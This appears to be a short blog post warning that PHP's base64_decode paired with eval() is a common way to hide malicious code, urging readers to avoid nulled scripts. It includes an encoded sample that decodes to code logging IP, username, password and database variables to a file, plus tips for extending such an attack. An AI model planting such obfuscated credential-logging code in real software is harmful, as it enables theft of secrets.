PHP base64_decode an exploiters main weapon

PHP’s base64_encode() and base64_decode() are functions that encode the inputted data with base64 and then decode it back to its original state before being encoded.

A classic example is a normal readable string that gets encoded

$normal = "A normal string that is readable";
$encode = base64_encode($normal);
echo $encode;//QSBub3JtYWwgc3RyaW5nIHRoYXQgaXMgcmVhZGFibGU=

Then to decode the now encoded string

$our_string = "QSBub3JtYWwgc3RyaW5nIHRoYXQgaXMgcmVhZGFibGU=";
echo base64_decode($our_string);//A normal string that is readable

This issue here is base64_decode() teamed with eval() is a common way to hack, exploit and gain access to the server, data or code.

In a directory of PHP exploit scripts base64_decode was found in 31 of the files. Wphackedhelp sums it up by saying base64_decode mostly exists in WordPress code when being used to hide malicious code.

As the example above shows you simply have no idea what the encoded string is, it could be a sentence or worst actual PHP code.

A soft example being this string

$our_string = 'DQokZGF0YSA9ICIkaXAgJHVzZXJuYW1lICRwYXNzd29yZCAkZGIiOw0KJGYgPSBmb3BlbigibG9nLnR4dCIsICJhIik7DQpmd3JpdGUoJGYsJGRhdGEuIlxyXHJcbiIpOw0KZmNsb3NlKCRmKTs=';

Looking at it you have no idea what it is, says or does.

echo base64_decode($our_string);

//eval($our_string); //runs

Gives this

$data = "$ip $username $password $db"; $f = fopen("log.txt", "a"); fwrite($f,$data."\r\r\n"); fclose($f);

//Formatted 

$data = "$ip $username $password $db";
$f = fopen("log.txt", "a");
fwrite($f, $data . "\r\r\n");
fclose($f);

Which will write (if the are set) those variables into a text file called log.txt Of course it would be better to turn of errors and add in many more common variables and see what gets written. That is just a small achievement with base64_decode and eval().

Creating a PHP file and then accessing it is common, as is the use of $_GET to have better “customization” over certain values being involved in the hack.

It can be an eye opener to see how easy and how much freedom one can have over running an encoded script on your server. More the reasons to never use nulled scripts, themes and plugins.